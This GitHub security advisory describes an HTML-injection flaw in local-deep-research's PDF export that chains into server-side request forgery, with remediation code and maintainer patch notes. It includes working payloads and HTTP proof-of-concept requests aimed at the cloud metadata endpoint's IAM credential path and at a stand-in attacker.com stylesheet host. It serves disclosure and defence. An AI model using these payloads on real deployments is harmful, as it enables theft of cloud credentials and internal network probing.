GHSA-fj2m-qvh9-jq4q

Source
https://github.com/advisories/GHSA-fj2m-qvh9-jq4q
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/05/GHSA-fj2m-qvh9-jq4q/GHSA-fj2m-qvh9-jq4q.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-fj2m-qvh9-jq4q
Aliases
  • CVE-2026-43979
Published
2026-05-11T19:40:07Z
Modified
2026-05-11T19:50:51.473267Z
Severity
  • 5.0 (Medium) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
Summary
local-deep-research is Vulnerable to HTML Injection via Unescaped User Input in PDF Export (`pdf_service.py:_markdown_to_html`)
Details

Summary

PDFService._markdown_to_html() constructs an HTML document by interpolating user-controlled values — specifically title (sourced from research.title or research.query) and metadata key-value pairs — directly into an f-string without any HTML escaping. An authenticated attacker can craft a research query containing HTML special characters to inject arbitrary HTML tags into the document processed by WeasyPrint during PDF export. This injection can be chained to trigger a Server-Side Request Forgery (SSRF), bypassing the application's existing SSRF defenses in ssrf_validator.py.


Details

Vulnerable code: src/local_deep_research/web/services/pdf_service.py, lines 171–176

# pdf_service.py:171-176
if title:
    html_parts.append(f"<title>{title}</title>")   # ← title is not escaped

if metadata:
    for key, value in metadata.items():
        html_parts.append(f'<meta name="{key}" content="{value}">')  # ← key/value are not escaped
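To make the breakout concrete, the following minimal Python sketch reproduces only the two interpolation lines quoted above. `build_head_vulnerable` is a hypothetical stand-in written for illustration. It is not the real `_markdown_to_html` and it does not invoke WeasyPrint.

```python
def build_head_vulnerable(title, metadata):
    """Hypothetical stand-in mirroring the unescaped f-strings quoted above."""
    html_parts = []
    if title:
        # Interpolated verbatim: a "</title>" inside title closes the element early.
        html_parts.append(f"<title>{title}</title>")
    if metadata:
        for key, value in metadata.items():
            # A '"' in key or value ends the attribute, so new markup can follow.
            html_parts.append(f'<meta name="{key}" content="{value}">')
    return "\n".join(html_parts)


title_payload = '</title><img src="http://169.254.169.254/latest/meta-data/" />'
meta_payload = '" /><link rel="stylesheet" href="http://attacker.com/evil.css'

print(build_head_vulnerable(title_payload, {"author": meta_payload}))
```

The two printed lines match the Rendered examples given for injection points 1 and 2 (with author as the meta name).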

Data flow trace:

User input: research.query
        │
        ▼
research_routes.py:1321
  pdf_title = research.title or research.query
        │
        ▼
research_routes.py:1325-1326
  export_report_to_memory(report_content, format, title=pdf_title)
        │
        ▼
pdf_service.py:107
  PDFService.markdown_to_pdf(markdown_content, title=pdf_title)
        │
        ▼
pdf_service.py:137
  _markdown_to_html(markdown_content, title, metadata)
        │
        ▼
pdf_service.py:172
  f"<title>{title}</title>"   ← injection point, no escaping
        │
        ▼
pdf_service.py:112
  HTML(string=html_content)   ← WeasyPrint renders the injected HTML

research.query is a string submitted by the user via POST /api/start_research, stored as-is in the database, and retrieved without any sanitization. When the user triggers POST /api/v1/research/<research_id>/export/pdf, this value is embedded unescaped into the HTML document processed by WeasyPrint.

Injection point 1: <title> tag breakout

Input:    </title><img src="http://169.254.169.254/latest/meta-data/" />
Rendered: <title></title><img src="http://169.254.169.254/latest/meta-data/" /></title>

When WeasyPrint encounters the injected <img> tag, it fetches the URL in its src attribute with an HTTP GET request; this is its default behavior.

Injection point 2: <meta> attribute breakout

Input:    " /><link rel="stylesheet" href="http://attacker.com/evil.css
Rendered: <meta name="..." content="" /><link rel="stylesheet" href="http://attacker.com/evil.css">

WeasyPrint will fetch and apply the external stylesheet, which also constitutes SSRF.
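One way to see which outbound requests an injected fragment would trigger is to list its URL-bearing attributes. The sketch below does that with Python's standard html.parser on the two rendered fragments above. The URL_ATTRS set is an assumption chosen for illustration, and CSS-level references (@import, url()) that WeasyPrint also resolves are not inspected.

```python
from html.parser import HTMLParser

# (tag, attribute) pairs treated as resource references. An illustrative
# subset only; it is not WeasyPrint's full list and ignores CSS url()/@import.
URL_ATTRS = {("img", "src"), ("link", "href"), ("object", "data"), ("embed", "src")}


class ResourceURLCollector(HTMLParser):
    """Collect attribute URLs that an HTML-to-PDF renderer may try to fetch."""

    def __init__(self):
        super().__init__()
        self.urls = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases tag and attribute names; self-closing tags such
        # as <img ... /> also reach this method via handle_startendtag.
        for name, value in attrs:
            if (tag, name) in URL_ATTRS and value:
                self.urls.append(value)


rendered = (
    '<title></title><img src="http://169.254.169.254/latest/meta-data/" /></title>\n'
    '<meta name="author" content="" /><link rel="stylesheet" href="http://attacker.com/evil.css">'
)
collector = ResourceURLCollector()
collector.feed(rendered)
collector.close()
print(collector.urls)
```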


Proof of Concept

Step 1: Log in and submit a research query containing the injection payload

POST /api/start_research HTTP/1.1
Host: localhost:5000
Content-Type: application/json
Cookie: session=<valid_session>

{
  "query": "</title><img src=\"http://169.254.169.254/latest/meta-data/iam/security-credentials/\" onerror=\"x\"/>",
  "mode": "quick",
  "model_provider": "OLLAMA",
  "model": "llama3"
}

The response returns a research_id, e.g. "aaaa-bbbb-cccc-dddd".

Step 2: After the research completes, trigger PDF export

POST /api/v1/research/aaaa-bbbb-cccc-dddd/export/pdf HTTP/1.1
Host: localhost:5000
Cookie: session=<valid_session>
X-CSRFToken: <csrf_token>

Step 3: Intermediate HTML constructed server-side

<!DOCTYPE html><html><head>
<meta charset="utf-8">
<title></title><img src="http://169.254.169.254/latest/meta-data/iam/security-credentials/" onerror="x"/></title>
</head><body>
...report content...
</body></html>

Step 4: WeasyPrint issues an outbound HTTP request to the injected URL

Observed via network monitoring (e.g. tcpdump) or in the target internal service's logs:

GET /latest/meta-data/iam/security-credentials/ HTTP/1.1
Host: 169.254.169.254
User-Agent: WeasyPrint/...
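Steps 1 and 2 can also be scripted. This sketch builds both requests with the standard library's urllib.request without sending them. The cookie and CSRF values are the placeholders from the requests above, and build_poc_requests is a hypothetical helper.

```python
import json
import urllib.request


def build_poc_requests(base_url, session_cookie, csrf_token, research_id):
    """Build, but do not send, the Step 1 and Step 2 requests."""
    payload = (
        '</title><img src="http://169.254.169.254/latest/meta-data/'
        'iam/security-credentials/" onerror="x"/>'
    )
    body = {"query": payload, "mode": "quick", "model_provider": "OLLAMA", "model": "llama3"}
    start = urllib.request.Request(
        f"{base_url}/api/start_research",
        data=json.dumps(body).encode("utf-8"),
        headers={"Content-Type": "application/json", "Cookie": f"session={session_cookie}"},
        method="POST",
    )
    # research_id is the value returned by Step 1 once the research completes.
    export = urllib.request.Request(
        f"{base_url}/api/v1/research/{research_id}/export/pdf",
        headers={"Cookie": f"session={session_cookie}", "X-CSRFToken": csrf_token},
        method="POST",
    )
    return start, export


start_req, export_req = build_poc_requests(
    "http://localhost:5000", "<valid_session>", "<csrf_token>", "aaaa-bbbb-cccc-dddd"
)
print(start_req.get_method(), start_req.full_url)
print(export_req.get_method(), export_req.full_url)
```

To execute, pass each request to urllib.request.urlopen(). In practice the export request is built only after Step 1 has returned the research_id and the research has completed.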

Lightweight verification (no SSRF environment required):

Set the query to:

</title><title>INJECTED

The resulting HTML will contain two <title> tags and the PDF document metadata title will read INJECTED, confirming successful injection.
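The lightweight check can be automated at the string level. This sketch reproduces the unescaped <title> interpolation and counts the resulting <title> elements with html.parser. TitleCounter is a hypothetical helper. It does not model how WeasyPrint selects a document title when more than one is present.

```python
from html.parser import HTMLParser


class TitleCounter(HTMLParser):
    """Record the text of every <title> element in the order they appear."""

    def __init__(self):
        super().__init__()
        self.titles = []
        self._in_title = False

    def handle_starttag(self, tag, attrs):
        if tag == "title":
            self.titles.append("")
            self._in_title = True

    def handle_endtag(self, tag):
        if tag == "title":
            self._in_title = False

    def handle_data(self, data):
        if self._in_title:
            self.titles[-1] += data


query = "</title><title>INJECTED"
head = f"<title>{query}</title>"  # same unescaped interpolation as pdf_service.py
counter = TitleCounter()
counter.feed(head)
counter.close()
print(counter.titles)
```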


Impact

1. Chained SSRF (High Severity)

By injecting <img src> or <link href> tags, or a <style> block containing @import url(), that point to internal addresses, an attacker makes WeasyPrint issue HTTP requests on behalf of the server during PDF generation. This allows access to:

  • Cloud metadata services (169.254.169.254) on AWS, GCP, or Azure — enabling theft of IAM credentials and instance identity documents.
  • Internal network services (192.168.x.x, 10.x.x.x) — enabling reconnaissance and interaction with internal APIs not exposed to the internet.
  • Localhost administrative interfaces — if SSRF protections are only applied at the user-input validation layer.

This is an effective bypass of the application's existing SSRF defenses in ssrf_validator.py, because WeasyPrint's outbound resource requests are never routed through that validator.
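The destinations listed above fall into a few address classes that an SSRF check is expected to refuse. A minimal sketch of that classification with Python's ipaddress module follows. It is not the project's ssrf_validator.py (whose internals this advisory does not show), and it handles IP literals only, since hostnames would first need DNS resolution. A check like this only helps if the renderer's own fetches pass through it.

```python
import ipaddress


def classify_destination(host):
    """Label an IP-literal host with the SSRF-relevant class it falls in.

    Raises ValueError for anything that is not an IP literal (e.g. hostnames).
    """
    ip = ipaddress.ip_address(host)
    if ip.is_loopback:
        return "loopback"
    if ip.is_link_local:
        # 169.254.0.0/16 contains the 169.254.169.254 cloud metadata endpoint.
        return "link-local (cloud metadata)"
    if ip.is_private:
        return "private (internal network)"
    return "public"


for host in ["169.254.169.254", "10.0.0.5", "192.168.1.10", "127.0.0.1", "8.8.8.8"]:
    print(host, "->", classify_destination(host))
```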

2. HTML Document Structure Corruption

Injected tags can prematurely close <head> and insert arbitrary content into <body>, causing WeasyPrint to render incorrectly or crash, resulting in a Denial of Service (DoS) condition for the export functionality.

3. CSS Injection (Medium Severity)

By injecting <link> or <style> tags that load external stylesheets, an attacker can fully control the visual content of the generated PDF, enabling report content forgery or spoofing.

4. Affected Scope

  • All PDF export operations are affected.
  • The vulnerability is reachable by any authenticated user — no elevated privileges required.

    - Because each user operates against their own encrypted database, cross-user exploitation is not possible. However, on any shared or multi-tenant deployment, every authenticated user can independently trigger this vulnerability.

Remediation

Apply html.escape() to all user-controlled values before embedding them in the HTML template inside _markdown_to_html:

import html

if title:
    html_parts.append(f"<title>{html.escape(title)}</title>")

if metadata:
    for key, value in metadata.items():
        html_parts.append(
            f'<meta name="{html.escape(str(key))}" content="{html.escape(str(value))}">'
        )
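As a quick check of the fix, the sketch below applies the same html.escape() calls to both injection payloads. build_head_escaped is a hypothetical stand-in for the patched section of _markdown_to_html. html.escape() converts &, <, > and, with its default quote=True, both quote characters, so neither payload can close the element or attribute it sits in.

```python
import html


def build_head_escaped(title, metadata):
    """Hypothetical stand-in for the patched head-building code."""
    html_parts = []
    if title:
        # Escaping turns "</title>" into inert text inside the element.
        html_parts.append(f"<title>{html.escape(title)}</title>")
    if metadata:
        for key, value in metadata.items():
            # quote=True (the default) also escapes '"', so attributes stay closed.
            html_parts.append(
                f'<meta name="{html.escape(str(key))}" content="{html.escape(str(value))}">'
            )
    return "\n".join(html_parts)


out = build_head_escaped(
    '</title><img src="http://169.254.169.254/latest/meta-data/" />',
    {"author": '" /><link rel="stylesheet" href="http://attacker.com/evil.css'},
)
print(out)
```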

Additionally, consider configuring WeasyPrint with a custom url_fetcher that blocks or restricts outbound HTTP requests, to prevent SSRF via injected or legitimately embedded external resources:

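import weasyprint
from weasyprint import HTML

# Module path assumed from the maintainer note (security.ssrf_validator).
from local_deep_research.security.ssrf_validator import validate_url


def safe_url_fetcher(url, timeout=10):
    # Refuse any resource URL the SSRF validator rejects before WeasyPrint fetches it.
    if not validate_url(url):
        raise ValueError(f"Blocked unsafe URL in PDF rendering: {url}")
    return weasyprint.default_url_fetcher(url, timeout=timeout)


html_doc = HTML(string=html_content, url_fetcher=safe_url_fetcher)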

Report generated against commit f3540fb3 — local-deep-research, branch main.


Maintainer note (2026-04-24)

Thanks @Firebasky for the detailed report. The complete remediation spans two PRs, both merged to main:

#3082 (merged 2026-03-29, shipped in v1.5.0+) closes the HTML-injection sinks:
  • html.escape() now wraps the title value in <title>…</title>
  • Same for metadata keys/values in <meta name="…" content="…">
  • Regression tests added in tests/web/services/test_pdf_service.py

#3613 (merged 2026-04-24, shipped in v1.6.0) implements the url_fetcher recommendation from the Remediation section:
  • New _safe_url_fetcher in pdf_service.py delegates to weasyprint.default_url_fetcher only after security.ssrf_validator.validate_url accepts the URL
  • Blocks AWS metadata (169.254.169.254), RFC1918, loopback, and non-http(s) schemes
  • Covers the chained SSRF path through any URL reaching the rendered HTML: markdown body, citations, and raw-HTML passthrough via Python-Markdown
  • Blocked URLs raise UnsafePDFResourceURLError (a ValueError subclass) so WeasyPrint skips the resource and the render continues
  • 8 regression tests, including an end-to-end render with <img src="http://169.254.169.254/…"> embedded in the body
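The source of _safe_url_fetcher is not reproduced here. The sketch below only illustrates the shape the note describes: validate first, delegate second, and raise a ValueError subclass for blocked URLs. UnsafePDFResourceURLError is named in PR #3613, but its body here, make_guarded_fetcher, and the toy validator and fake fetcher are hypothetical, injected so the wrapper runs without WeasyPrint or network access.

```python
class UnsafePDFResourceURLError(ValueError):
    """Blocked-URL error; the name follows PR #3613, the body is a sketch."""


def make_guarded_fetcher(validate_url, delegate_fetcher):
    """Wrap a url_fetcher-style callable so it only runs for approved URLs.

    validate_url: callable(str) -> bool, e.g. the project's SSRF validator.
    delegate_fetcher: the real fetcher, e.g. weasyprint.default_url_fetcher.
    """

    def guarded_fetcher(url, timeout=10):
        if not validate_url(url):
            # A ValueError subclass, so per the maintainer note WeasyPrint
            # skips this resource instead of aborting the whole render.
            raise UnsafePDFResourceURLError(f"Blocked unsafe URL in PDF rendering: {url}")
        return delegate_fetcher(url, timeout=timeout)

    return guarded_fetcher


# Stand-ins so the wrapper can be exercised without WeasyPrint.
fetched = []


def fake_fetch(url, timeout=10):
    fetched.append(url)
    return {"string": b"", "mime_type": "text/css"}


def toy_validator(url):
    # Toy rule for the demo only: allow https URLs that avoid the metadata IP.
    return url.startswith("https://") and "169.254.169.254" not in url


fetcher = make_guarded_fetcher(toy_validator, fake_fetch)
fetcher("https://example.com/style.css")
try:
    fetcher("http://169.254.169.254/latest/meta-data/")
except UnsafePDFResourceURLError as exc:
    print("blocked:", exc)
print(fetched)
```

In a real deployment the delegate would be weasyprint.default_url_fetcher, the validator would be the project's validate_url, and the wrapper would be passed as HTML(string=..., url_fetcher=...).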

Advisory metadata: CVSS CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N (5.0 Moderate), CWEs CWE-79 + CWE-918. Patched in v1.6.0 — upgrade to v1.6.0 or later to receive both fixes.
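Because every release before 1.6.0 is listed as affected, a local check only needs to compare the installed version with that boundary. This sketch uses importlib.metadata from the standard library and the PyPI distribution name local-deep-research. parse_release is a deliberately simplified, hypothetical parser for plain X.Y.Z strings.

```python
from importlib import metadata

FIXED_IN = (1, 6, 0)  # first release carrying both #3082 and #3613


def parse_release(version):
    """Parse 'X.Y.Z' into a tuple of ints for comparison.

    Simplified on purpose: on a non-numeric segment (e.g. '1.6.0rc1') it stops
    early and returns the shorter tuple, so such versions sort below 1.6.0 and
    are conservatively treated as unpatched.
    """
    parts = []
    for piece in version.split("."):
        if not piece.isdigit():
            return tuple(parts)
        parts.append(int(piece))
    # Pad plain releases so that '1.6' and '1.6.0' compare equal.
    return tuple(parts + [0] * (3 - len(parts)))


def is_patched(version):
    return parse_release(version) >= FIXED_IN


def installed_is_patched(dist_name="local-deep-research"):
    """True/False for the installed distribution, or None if it is absent."""
    try:
        return is_patched(metadata.version(dist_name))
    except metadata.PackageNotFoundError:
        return None
```

For full PEP 440 handling (pre-, post- and dev-releases), the third-party packaging library's Version class is the more robust choice.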

Database specific
{
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-11T19:40:07Z",
    "cwe_ids": [
        "CWE-79",
        "CWE-918"
    ],
    "severity": "MODERATE",
    "nvd_published_at": null
}

Affected packages

PyPI / local-deep-research

Package

Name
local-deep-research
Purl
pkg:pypi/local-deep-research

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0 (unknown introduced version; all previous versions are affected)
Fixed
1.6.0

Affected versions

0.*
0.1.0
0.1.1
0.1.12
0.1.13
0.1.14
0.1.15
0.1.16
0.1.17
0.1.18
0.1.19
0.1.20
0.1.21
0.1.22
0.1.23
0.1.24
0.1.25
0.1.26
0.2.0
0.2.2
0.2.3
0.3.0
0.3.1
0.3.2
0.3.3
0.3.5
0.3.6
0.3.8
0.3.9
0.3.10
0.3.11
0.3.12
0.4.0
0.4.1
0.4.2
0.4.3
0.4.4
0.5.0
0.5.2
0.5.3
0.5.4
0.5.5
0.5.6
0.5.7
0.5.9
0.6.0
0.6.1
0.6.4
0.6.5
0.6.7
1.*
1.0.0
1.0.1
1.1.1
1.1.6
1.1.7
1.1.8
1.1.9
1.1.10
1.1.11
1.2.0
1.2.1
1.2.2
1.2.3
1.2.4
1.2.5
1.2.6
1.2.7
1.2.8
1.2.9
1.2.10
1.2.11
1.2.12
1.2.13
1.2.14
1.2.15
1.2.16
1.2.17
1.2.24
1.2.25
1.2.26
1.2.27
1.2.28
1.3.0
1.3.1
1.3.6
1.3.7
1.3.8
1.3.9
1.3.10
1.3.11
1.3.12
1.3.13
1.3.14
1.3.15
1.3.16
1.3.17
1.3.18
1.3.19
1.3.20
1.3.21
1.3.22
1.3.24
1.3.25
1.3.26
1.3.28
1.3.29
1.3.30
1.3.40
1.3.41
1.3.42
1.3.43
1.3.44
1.3.45
1.3.46
1.3.47
1.3.48
1.3.49
1.3.50
1.3.51
1.3.52
1.3.53
1.3.54
1.3.55
1.3.56
1.3.57
1.3.58
1.3.59
1.3.60
1.4.0
1.5.0
1.5.3
1.5.5
1.5.6

Database specific

source
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/05/GHSA-fj2m-qvh9-jq4q/GHSA-fj2m-qvh9-jq4q.json"